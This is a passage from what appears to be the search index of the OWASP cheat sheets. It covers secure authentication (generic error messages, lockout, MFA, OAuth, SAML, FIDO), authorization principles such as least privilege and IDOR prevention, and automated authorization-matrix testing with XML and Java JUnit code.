In order to mitigate CSRF and session hijacking, it's important to require the current credentials for an account before updating sensitive account information such as the user's password, user's email, or before sensitive transactions, such as shipping a purchase to a new address. Without this countermeasure, an attacker may be able to execute sensitive transactions through a CSRF or XSS attack without needing to know the user's current credentials. Additionally, an attacker may get temporary physical access to a user's browser or steal their session ID to take over the user's session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#consider-strong-transaction-authentication","title":"Consider Strong Transaction Authentication","text":"

Some applications should use a second factor to check whether a user may perform sensitive operations. For more information, see the Transaction Authorization Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#tls-client-authentication","title":"TLS Client Authentication","text":"

TLS Client Authentication, also known as two-way TLS authentication, consists of both, browser and server, sending their respective TLS certificates during the TLS handshake process. Just as you can validate the authenticity of a server by using the certificate and asking a well known Certificate Authority (CA) if the certificate is valid, the server can authenticate the user by receiving a certificate from the client and validating against a third party CA or its own CA. To do this, the server must provide the user with a certificate generated specifically for him, assigning values to the subject so that these can be used to determine what user the certificate should validate. The user installs the certificate on a browser and now uses it for the website.

It is a good idea to do this when:

It is generally not a good idea to use this method for widely and publicly available websites that will have an average user. For example, it wouldn't be a good idea to implement this for a website like Facebook. While this technique can prevent the user from having to type a password (thus protecting against an average keylogger from stealing it), it is still considered a good idea to consider using both a password and TLS client authentication combined.

Additionally, if the client is behind an enterprise proxy which performs SSL/TLS decryption, this will break certificate authentication unless the site is allowed on the proxy.

For more information, see: Client-authenticated TLS handshake

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","title":"Authentication and Error Messages","text":"

Incorrectly implemented error messages in the case of authentication functionality can be used for the purposes of user ID and password enumeration. An application should respond (both HTTP and HTML) in a generic manner.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-responses","title":"Authentication Responses","text":"

Using any of the authentication mechanisms (login, password reset or password recovery), an application must respond with a generic error message regardless of whether:

The account registration feature should also be taken into consideration, and the same approach of generic error message can be applied regarding the case in which the user exists.

The objective is to prevent the creation of a discrepancy factor, allowing an attacker to mount a user enumeration action against the application.

It is interesting to note that the business logic itself can bring a discrepancy factor related to the processing time taken. Indeed, depending on the implementation, the processing time can be significantly different according to the case (success vs failure) allowing an attacker to mount a time-based attack (delta of some seconds for example).

Example using pseudo-code for a login feature:

IF USER_EXISTS(username) THEN\n    password_hash=HASH(password)\n    IS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\n    IF NOT IS_VALID THEN\n        RETURN Error(\"Invalid Username or Password!\")\n    ENDIF\nELSE\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

It can be clearly seen that if the user doesn't exist, the application will directly throw an error. Otherwise, when the user exists and the password doesn't, it is apparent that there will be more processing before the application errors out. In return, the response time will be different for the same error, allowing the attacker to differentiate between a wrong username and a wrong password.

password_hash=HASH(password)\nIS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\nIF NOT IS_VALID THEN\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

This code will go through the same process no matter what the user or the password is, allowing the application to return in approximately the same response time.

The problem with returning a generic error message for the user is a User Experience (UX) matter. A legitimate user might feel confused with the generic messages, thus making it hard for them to use the application, and might after several retries, leave the application because of its complexity. The decision to return a generic error message can be determined based on the criticality of the application and its data. For example, for critical applications, the team can decide that under the failure scenario, a user will always be redirected to the support page and a generic error message will be returned.

Regarding the user enumeration itself, protection against brute-force attack is also effective because they prevent an attacker from applying the enumeration at scale. Usage of CAPTCHA can be applied on a feature for which a generic error message cannot be returned because the user experience must be preserved.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#incorrect-and-correct-response-examples","title":"Incorrect and correct response examples","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login","title":"Login","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-recovery","title":"Password recovery","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-creation","title":"Account creation","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#error-codes-and-urls","title":"Error Codes and URLs","text":"

The application may return a different HTTP Error code depending on the authentication attempt response. It may respond with a 200 for a positive result and a 403 for a negative result. Even though a generic error page is shown to a user, the HTTP response code may differ which can leak information about whether the account is valid or not.

Error disclosure can also be used as a discrepancy factor, consult the error handling cheat sheet regarding the global handling of different errors in an application.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#protect-against-automated-attacks","title":"Protect Against Automated Attacks","text":"

There are a number of different types of automated attacks that attackers can use to try and compromise user accounts. The most common types are listed below:

Attack Type Description Brute Force Testing multiple passwords from a dictionary or other source against a single account. Credential Stuffing Testing username/password pairs obtained from the breach of another site. Password Spraying Testing a single weak password against a large number of different accounts.

Different protection mechanisms can be implemented to protect against these attacks. In many cases, these defences do not provide complete protection, but when a number of them are implemented in a defence-in-depth approach, a reasonable level of protection can be achieved.

The following sections will focus primarily on preventing brute-force attacks, although these controls can also be effective against other types of attacks. For further guidance on defending against credential stuffing and password spraying, see the Credential Stuffing Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defence against the majority of password-related attacks, including brute-force attacks, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

The Multifactor Authentication Cheat Sheet contains further guidance on implementing MFA.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login-throttling","title":"Login Throttling","text":"

Login Throttling is a protocol used to prevent an attacker from making too many attempts at guessing a password through normal interactive means, it includes:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

The most common protection against these attacks is to implement account lockout, which prevents any more login attempts for a period after a certain number of failed logins.

The counter of failed logins should be associated with the account itself, rather than the source IP address, in order to prevent an attacker from making login attempts from a large number of different IP addresses. There are a number of different factors that should be considered when implementing an account lockout policy in order to find a balance between security and usability:

Rather than implementing a fixed lockout duration (e.g., ten minutes), some applications use an exponential lockout, where the lockout duration starts as a very short period (e.g., one second), but doubles after each failed login attempt.

When designing an account lockout system, care must be taken to prevent it from being used to cause a denial of service by locking out other users' accounts. One way this could be performed is to allow the user of the forgotten password functionality to log in, even if the account is locked out.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

The use of an effective CAPTCHA can help to prevent automated login attempts against accounts. However, many CAPTCHA implementations have weaknesses that allow them to be solved using automated techniques or can be outsourced to services which can solve them. As such, the use of CAPTCHA should be viewed as a defence-in-depth control to make brute-force attacks more time consuming and expensive, rather than as a preventative.

It may be more user-friendly to only require a CAPTCHA be solved after a small number of failed login attempts, rather than requiring it from the very first login.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#security-questions-and-memorable-words","title":"Security Questions and Memorable Words","text":"

The addition of a security question or memorable word can also help protect against automated attacks, especially when the user is asked to enter a number of randomly chosen characters from the word. It should be noted that this does not constitute multi-factor authentication, as both factors are the same (something you know). Furthermore, security questions are often weak and have predictable answers, so they must be carefully chosen. The Choosing and Using Security Questions cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#logging-and-monitoring","title":"Logging and Monitoring","text":"

Enable logging and monitoring of authentication functions to detect attacks/failures on a real-time basis

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#use-of-authentication-protocols-that-require-no-password","title":"Use of authentication protocols that require no password","text":"

While authentication through a user/password combination and using multi-factor authentication is considered generally secure, there are use cases where it isn't considered the best option or even safe. Examples of this are third party applications that desire connecting to the web application, either from a mobile device, another website, desktop or other situations. When this happens, it is NOT considered safe to allow the third-party application to store the user/password combo, since then it extends the attack surface into their hands, where it isn't in your control. For this, and other use cases, there are several authentication protocols that can protect you from exposing your users' data to attackers.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#oauth","title":"OAuth","text":"

Open Authorization (OAuth) is a protocol that allows an application to authenticate against a server as a user, without requiring passwords or any third party server that acts as an identity provider. It uses a token generated by the server and provides how the authorization flows most occur, so that a client, such as a mobile application, can tell the server what user is using the service.

The recommendation is to use and implement OAuth 1.0a or OAuth 2.0 since the very first version (OAuth1.0) has been found to be vulnerable to session fixation.

OAuth 2.0 relies on HTTPS for security and is currently used and implemented by APIs from companies such as Facebook, Google, Twitter and Microsoft. OAuth1.0a is more difficult to use because it requires the use of cryptographic libraries for digital signatures. However, since OAuth1.0a does not rely on HTTPS for security, it can be more suited for higher-risk transactions.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#openid","title":"OpenId","text":"

OpenId is an HTTP-based protocol that uses identity providers to validate that a user is who they say they are. It is a very simple protocol which allows a service provider initiated way for single sign-on (SSO). This allows the user to re-use a single identity given to a trusted OpenId identity provider and be the same user in multiple websites, without the need to provide any website with the password, except for the OpenId identity provider.

Due to its simplicity and that it provides protection of passwords, OpenId has been well adopted. Some of the well-known identity providers for OpenId are Stack Exchange, Google, Facebook and Yahoo!

For non-enterprise environments, OpenId is considered a secure and often better choice, as long as the identity provider is of trust.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#saml","title":"SAML","text":"

Security Assertion Markup Language (SAML) is often considered to compete with OpenId. The most recommended version is 2.0 since it is very feature-complete and provides strong security. Like OpenId, SAML uses identity providers, but unlike OpenId, it is XML-based and provides more flexibility. SAML is based on browser redirects which send XML data. Furthermore, SAML isn't only initiated by a service provider; it can also be initiated from the identity provider. This allows the user to navigate through different portals while still being authenticated without having to do anything, making the process transparent.

While OpenId has taken most of the consumer market, SAML is often the choice for enterprise applications. The reason for this is often that there are few OpenId identity providers which are considered of enterprise-class (meaning that the way they validate the user identity doesn't have high standards required for enterprise identity). It is more common to see SAML being used inside of intranet websites, sometimes even using a server from the intranet as the identity provider.

In the past few years, applications like SAP ERP and SharePoint (SharePoint by using Active Directory Federation Services 2.0) have decided to use SAML 2.0 authentication as an often preferred method for single sign-on implementations whenever enterprise federation is required for web services and web applications.

See also: SAML Security Cheat Sheet

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#fido","title":"FIDO","text":"

The Fast Identity Online (FIDO) Alliance has created two protocols to facilitate online authentication: the Universal Authentication Framework (UAF) protocol and the Universal Second Factor (U2F) protocol. While UAF focuses on passwordless authentication, U2F allows the addition of a second factor to existing password-based authentication. Both protocols are based on a public key cryptography challenge-response model.

UAF takes advantage of existing security technologies present on devices for authentication including fingerprint sensors, cameras(face biometrics), microphones(voice biometrics), Trusted Execution Environments(TEEs), Secure Elements(SEs) and others. The protocol is designed to plug-in these device capabilities into a common authentication framework. UAF works with both native applications and web applications.

U2F augments password-based authentication using a hardware token (typically USB) that stores cryptographic authentication keys and uses them for signing. The user can use the same token as a second factor for multiple applications. U2F works with web applications. It provides protection against phishing by using the URL of the website to look up the stored authentication key.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-managers","title":"Password Managers","text":"

Password managers are programs, browser plugins or web services that automate management of large number of different credentials. Most password managers have functionality to allow users to easily use them on websites, either by pasting the passwords into the login form, or by simulating the user typing them in.

Web applications should not make password managers' job more difficult than necessary by observing the following recommendations:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html","title":"Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorization may be defined as \"the process of verifying that a requested action or service is approved for a specific entity\" (NIST). Authorization is distinct from authentication which is the process of verifying an entity's identity. When designing and developing a software solution, it is important to keep these distinctions in mind. A user who has been authenticated (perhaps by providing a username and password) is often not authorized to access every resource and perform every action that is technically possible through a system. For example, a web app may have both regular users and admins, with the admins being able to perform actions the average user is not privileged to do so, even though they have been authenticated. Additionally, authentication is not always required for accessing resources; an unauthenticated user may be authorized to access certain public resources, such as an image or login page, or even an entire web app.

The objective of this cheat sheet is to assist developers in implementing authorization logic that is robust, appropriate to the app's business context, maintainable, and scalable. The guidance provided in this cheat sheet should be applicable to all phases of the development lifecycle and flexible enough to meet the needs of diverse development environments.

Flaws related to authorization logic are a notable concern for web apps. Broken Access Control was ranked as the most concerning web security vulnerability in OWASP's 2021 Top 10 and asserted to have a \"High\" likelihood of exploit by MITRE's CWE program. Furthermore, according to Veracode's State of Software Vol. 10, Access Control was among the more common of OWASP's Top 10 risks to be involved in exploits and security incidents despite being among the least prevalent of those examined.

The potential impact resulting from exploitation of authorization flaws is highly variable, both in form and severity. Attackers may be able read, create, modify, or delete resources that were meant to be protected (thus jeopardizing their confidentiality, integrity, and/or availability); however, the actual impact of such actions is necessarily linked to the criticality and sensitivity of the compromised resources. Thus, the business cost of a successfully exploited authorization flaw can range from very low to extremely high.

Both entirely unauthenticated outsiders and authenticated (but not necessarily authorized) users can take advantage of authorization weaknesses. Although honest mistakes or carelessness on the part of non-malicious entities may enable authorization bypasses, malicious intent is typically required for access control threats to be fully realized. Horizontal privilege elevation (i.e. being able to access another user's resources) is an especially common weakness that an authenticated user may be able to take advantage of. Faults related to authorization control can allow malicious insiders and outsiders alike to view, modify, or delete sensitive resources of all forms (databases records, static files, personally identifiable information (PII), etc.) or perform actions, such as creating a new account or initiating a costly order, that they should not be privileged to do. Furthermore, if logging related to access control is not properly set-up, such authorization violations may go undetected or a least remain unattributable to a particular individual or group.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#recommendations","title":"Recommendations","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-least-privileges","title":"Enforce Least Privileges","text":"

As a security concept, Least Privileges refers to the principle of assigning users only the minimum privileges necessary to complete their job. Although perhaps most commonly applied in system administration, this principle has relevance to the software developer as well. Least Privileges must be applied both horizontally and vertically. For example, even though both an accountant and sales representative may occupy the same level in an organization's hierarchy, both require access to different resources to perform their jobs. The accountant should likely not be granted access to a customer database and the sales representative should not be able to access payroll data. Similarly, the head of the sales department is likely to need more privileged access than their subordinates.

Failure to enforce least privileges in an application can jeopardize the confidentiality of sensitive resources. Mitigation strategies are applied primarily during the Architecture and Design phase (see CWE-272); however, the principle must be addressed throughout the SDLC.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#deny-by-default","title":"Deny by Default","text":"

Even when no access control rules are explicitly matched, the application cannot remain neutral when an entity is requesting access to a particular resource. The application must always make a decision, whether implicitly or explicitly, to either deny or permit the requested access. Logic errors and other mistakes relating to access control may happen, especially when access requirements are complex; consequently, one should not rely entirely on explicitly defined rules for matching all possible requests. For security purposes an application should be configured to deny access by default.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#validate-the-permissions-on-every-request","title":"Validate the Permissions on Every Request","text":"

Permission should be validated correctly on every request, regardless of whether the request was initiated by an AJAX script, server-side, or any other source. The technology used to perform such checks should allow for global, application-wide configuration rather than needing to be applied individually to every method or class. Remember an attacker only needs to find one way in. Even if just a single access control check is \"missed\", the confidentiality and/or integrity of a resource can be jeopardized. Validating permissions correctly on just the majority of requests is insufficient. Specific technologies that can help developers in performing such consistent permission checks include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#thoroughly-review-the-authorization-logic-of-chosen-tools-and-technologies-implementing-custom-logic-if-necessary","title":"Thoroughly Review the Authorization Logic of Chosen Tools and Technologies, Implementing Custom Logic if Necessary","text":"

Today's developers have access to vast amount of libraries, platforms, and frameworks that allow them to incorporate robust, complex logic into their apps with minimal effort. However, these frameworks and libraries must not be viewed as a quick panacea for all development problems; developers have a duty to use such frameworks responsibly and wisely. Two general concerns relevant to framework/library selection as relevant to proper access control are misconfiguration/lack of configuration on the part of the developer and vulnerabilities within the components themselves (see A6 and A9 for general guidance on these topics).

Even in an otherwise securely developed application, vulnerabilities in third-party components can allow an attacker to bypass normal authorization controls. Such concerns need not be restricted to unproven or poorly maintained projects, but affect even the most robust and popular libraries and frameworks. Writing complex, secure software is hard. Even the most competent developers, working on high-quality libraries and frameworks, will make mistakes. Assume any third-party component you incorporate into an application could be or become subject to an authorization vulnerability. Important considerations include:

Misconfiguration (or complete lack of configuration) is another major area in which the components developers build upon can lead to broken authorization. These components are typically intended to be relatively general purpose tools made to appeal to a wide audience. For all but the simplest use cases, these frameworks and libraries must be customized or supplemented with additional logic in order to meet the unique requirements of a particular app or environment. This consideration is especially important when security requirements, including authorization, are concerned. Notable configuration considerations for authorization include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#prefer-attribute-and-relationship-based-access-control-over-rbac","title":"Prefer Attribute and Relationship Based Access Control over RBAC","text":"

In software engineering, two basic forms of access control are widely utilized: Role-Based Access Control (RBAC) and Attribute-Based Access Control (ABAC). There is a third, more recent, model which has gained popularity: Relationship-Based Access Control (ReBAC). The decision between the models has significant implications for the entire SDLC and should be made as early as possible.

Although RBAC has a long history and remains popular among software developers today, ABAC and ReBAC should typically be preferred for application development. Their advantages over RBAC include:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#ensure-lookup-ids-are-not-accessible-even-when-guessed-or-cannot-be-tampered-with","title":"Ensure Lookup IDs are Not Accessible Even When Guessed or Cannot Be Tampered With","text":"

Applications often expose the internal object identifiers (such as an account number or Primary Key in a database) that are used to locate and reference an object. This ID may exposed as a query parameter, path variable, \"hidden\" form field or elsewhere. For example:

https://mybank.com/accountTransactions?acct_id=901

Based on this URL, one could reasonably assume that the application will return a listing of transactions and that the transactions returned will be restricted to a particular account - the account indicated in the acct_id param. But what would happen if the user changed the value of the acct_id param to another value such as 523. Will the user be able to view transactions associated with another account even if it does not belong to him? If not, will the failure simply be the result of the account \"523\" not existing/not being found or will it be due to a failed access control check? Although this example may be an oversimplification, it illustrates a very common security flaw in application development - CWE 639: Authorization Bypass Through User-Controlled Key. When exploited, this weakness can result in authorization bypasses, horizontal privilege escalation and, less commonly, vertical privilege escalation (see CWE-639). This type of vulnerability also represents a form of Insecure Direct Object Reference (IDOR). The following paragraphs will describe the weakness and possible mitigations.

In the example of above, the lookup ID was not only exposed to the user and readily tampered with, but also appears to have been a fairly predictable, perhaps sequential, value. While one can use various techniques to mask or randomize these IDs and make them hard to guess, such an approach is generally not sufficient by itself. A user should not be able to access a resource they do not have permissions simply because they are able to guess and manipulate that object's identifier in a query param or elsewhere. Rather than relying on some form of security through obscurity, the focus should be on controlling access to the underlying objects and/or the identifiers themselves. Recommended mitigations for this weakness include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-authorization-checks-on-static-resources","title":"Enforce Authorization Checks on Static Resources","text":"

The importance of securing static resources is often overlooked or at least overshadowed by other security concerns. Although securing databases and similar data stores often justly receive significant attention from security conscious teams, static resources must also be appropriately secured. Although unprotected static resources are certainly a problem for websites and web applications of all forms, in recent years, poorly secured resources in cloud storage offerings (such as Amazon S3 Buckets) have risen to prominence. When securing static resources, consider the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#verify-that-authorization-checks-are-performed-in-the-right-location","title":"Verify that Authorization Checks are Performed in the Right Location","text":"

Developers must never rely on client-side access control checks. While such checks may be permissible for improving the user experience, they should never be the decisive factor in granting or denying access to a resource; client-side logic is often easy to bypass. Access control checks must be performed server-side, at the gateway, or using serverless function (see OWASP ASVS 4.0.3, V1.4.1 and V4.1.1)

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#exit-safely-when-authorization-checks-fail","title":"Exit Safely when Authorization Checks Fail","text":"

Failed access control checks are a normal occurrence in a secured application; consequently, developers must plan for such failures and handle them securely. Improper handling of such failures can lead to the application being left in an unpredictable state (CWE-280: Improper Handling of Insufficient Permissions or Privileges). Specific recommendations include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#implement-appropriate-logging","title":"Implement Appropriate Logging","text":"

Logging is one of the most important detective controls in application security; insufficient logging and monitoring is recognized as among the most critical security risks in OWASP's Top Ten 2021. Appropriate logs can not only detect malicious activity, but are also invaluable resources in post-incident investigations, can be used to troubleshoot access control and other security related problems, and are useful in security auditing. Though easy to overlook during the initial design and requirements phase, logging is an important component of wholistic application security and must be incorporated into all phases of the SDLC. Recommendations for logging include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#create-unit-and-integration-test-cases-for-authorization-logic","title":"Create Unit and Integration Test Cases for Authorization Logic","text":"

Unit and integration testing are essential for verifying that an application performs as expected and consistently across changes. Flaws in access control logic can be subtle, particularly when requirements are complex; however, even a small logical or configuration error in access control can result in severe consequences. Although not a substitution for a dedicated security test or penetration test (see OWASP WSTG 4.5 for an excellent guide on this topic as it relates to access control), automated unit and integration testing of access control logic can help reduce the number of security flaws that make it into production. These tests are good at catching the \"low-hanging fruit\" of security issues but not more sophisticated attack vectors (OWASP SAMM: Security Testing).

Unit and integration testing should aim to incorporate many of the concepts explored in this document. For example, is access being denied by default? Does the application terminate safely when an access control check fails, even under abnormal conditions? Are ABAC policies being properly enforced? While simple unit and integrations test can never replace manual testing performed by a skilled hacker, they are an important tool for detecting and correcting security issues quickly and with far less resources than manual testing.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#abac","title":"ABAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rbac","title":"RBAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rebac","title":"ReBAC","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html","title":"Authorization Testing Automation Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorizations definition and implementation is one of the important protection measures of an application. They are defined in the creation phase of the project and, even if authorization issues are found when the application is initially released and submitted to a security audit before to going live, the most significant number of issues related to authorization come in the maintenance lifetime of the application.

This situation is often explained by the fact that features are added/modified and no review of the authorizations is performed on the application before the publishing of the new release, for cost or time issue reason.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#context","title":"Context","text":"

In order to try to address this situation, it can be interesting to automate the evaluation of the authorizations definition and implementation on the application. This, to constantly ensure that implementation of the authorizations in the application is consistent with the authorizations' definition.

An authorization is often composed by 2 elements (also named dimensions): The Feature, and the Logical Role that can access it (sometime a third dimension named Data is added in order to define access that includes a filtering at business data level).

The representation of the different combinations of these 2 dimensions is often named an Authorization matrix and is often formalized in a spreadsheet.

During a test of an authorization, a Logical Role is also called a Point Of View.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#objective","title":"Objective","text":"

This article describes a proposition of implementation in order to automate the tests of an authorization matrix.

This article assumes that 2 dimensions are used to represent an authorization for the technical proposition described and takes an application exposing REST services as an example.

The objective is to provide starting ideas/hints in order to create a tailored way of testing of the authorization matrix for the target application.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#proposition","title":"Proposition","text":"

In order to achieve the full automation of the evaluation of the authorization matrix, the following actions have been performed:

  1. Formalize the authorization matrix in a pivot format file allowing:

    1. The processing by a program easily.
    2. To be read and updated by a human for the follow-up of the authorization combinations.
    3. Hierarchy in the information in order to easily materialize the different combinations.
    4. The maximum possible of independence from the technology and design used to implement the application exposing the features.
  2. Create a set of integration tests that fully use the authorization matrix pivot file as input source in order to evaluate the different combinations with:

    1. The minimum possible of maintenance when the authorization matrix pivot file is updated.
    2. A clear indication, in case of failed test, of the source authorization combination that does not respect the authorization matrix.
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#authorization-matrix-pivot-file","title":"Authorization matrix pivot file","text":"

The XML format has been used to formalize the authorization matrix.

The XML structure contains 3 main sections:

This is an example of the XML used to represent the authorization:

Placeholders (values between {}) are used to mark location where test value must be placed by the integration tests if needed

  <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n      This file materializes the authorization matrix for the different\n      services exposed by the system.\n\n      It will be used by the tests as a input source for the different tests cases:\n      1) Evaluate legitimate access and its correct implementation\n      2) Identify not legitimate access (authorization definition issue\n      on service implementation)\n\n      The \"name\" attribute is used to uniquely identify a SERVICE or a ROLE.\n  -->\n<authorization-matrix>\n\n<!-- Describe the possible logical roles used in the system, is used here to\n      provide a list+explanation\n      of the different roles (authorization level) -->\n<roles>\n<role name=\"ANONYMOUS\"\ndescription=\"Indicate that no authorization is needed\"/>\n<role name=\"BASIC\"\ndescription=\"Role affecting a standard user (lowest access right just above anonymous)\"/>\n<role name=\"ADMIN\"\ndescription=\"Role affecting an administrator user (highest access right)\"/>\n</roles>\n\n<!-- List and describe the available services exposed by the system and the associated\n      logical role(s) that can call them -->\n<services>\n<service name=\"ReadSingleMessage\" uri=\"/{messageId}\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"ReadAllMessages\" uri=\"/\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"CreateMessage\" uri=\"/\" http-method=\"PUT\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"DeleteMessage\" uri=\"/{messageId}\" http-method=\"DELETE\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ADMIN\"/>\n</service>\n</services>\n\n<!-- Provide a test payload for each service if needed -->\n<services-testing>\n<service name=\"ReadSingleMessage\">\n<payload/>\n</service>\n<service name=\"ReadAllMessages\">\n<payload/>\n</service>\n<service name=\"CreateMessage\">\n<payload content-type=\"application/json\">\n{\"content\":\"test\"}\n              </payload>\n</service>\n<service name=\"DeleteMessage\">\n<payload/>\n</service>\n</services-testing>\n\n</authorization-matrix>\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#integration-tests","title":"Integration tests","text":"

Integration tests are implemented using a maximum of factorized code and one test case by Point Of View (POV) has been created in order to group the verifications by profile of access level (logical role) and facilitate the rendering/identification of the errors.

Parsing, object mapping and access to the authorization matrix information has been implemented using XML marshalling/unmarshalling built-in features provided by the technology used to implement the tests (JAXB here) in order to limit the code to the one in charge of performing the tests.

This is the implementation of the integration tests case class:

  import org.owasp.pocauthztesting.enumeration.SecurityRole;\nimport org.owasp.pocauthztesting.service.AuthService;\nimport org.owasp.pocauthztesting.vo.AuthorizationMatrix;\nimport org.apache.http.client.methods.CloseableHttpResponse;\nimport org.apache.http.client.methods.HttpDelete;\nimport org.apache.http.client.methods.HttpGet;\nimport org.apache.http.client.methods.HttpPut;\nimport org.apache.http.client.methods.HttpRequestBase;\nimport org.apache.http.entity.StringEntity;\nimport org.apache.http.impl.client.CloseableHttpClient;\nimport org.apache.http.impl.client.HttpClients;\nimport org.junit.Assert;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\nimport org.xml.sax.InputSource;\nimport javax.xml.bind.JAXBContext;\nimport javax.xml.parsers.SAXParserFactory;\nimport javax.xml.transform.Source;\nimport javax.xml.transform.sax.SAXSource;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.Optional;\n\n/**\n   * Integration Test cases in charge of validate the correct implementation of the authorization matrix.\n   * Create on test case by logical role that will test access on all services exposed by the system.\n   * Implements here focus on readability\n   */\npublic class AuthorizationMatrixIT {\n\n/**\n       * Object representation of the authorization matrix\n       */\nprivate static AuthorizationMatrix AUTHZ_MATRIX;\n\nprivate static final String BASE_URL = \"http://localhost:8080\";\n\n\n/**\n       * Load the authorization matrix in objects tree\n       *\n       * @throws Exception If any error occurs\n       */\n@BeforeClass\npublic static void globalInit() throws Exception {\ntry (FileInputStream fis = new FileInputStream(new File(\"authorization-matrix.xml\"))) {\nSAXParserFactory spf = SAXParserFactory.newInstance();\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(fis));\nJAXBContext jc = JAXBContext.newInstance(AuthorizationMatrix.class);\nAUTHZ_MATRIX = (AuthorizationMatrix) jc.createUnmarshaller().unmarshal(xmlSource);\n}\n}\n\n/**\n       * Test access to the services from a anonymous user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAnonymousUserPointOfView() throws Exception {\n//Run the tests - No access token here\nList<String> errors = executeTestWithPointOfView(SecurityRole.ANONYMOUS, null);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ANONYMOUS USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a basic user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingBasicUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"basic\", SecurityRole.BASIC);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.BASIC, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the BASIC USER point of view:\\n \" + 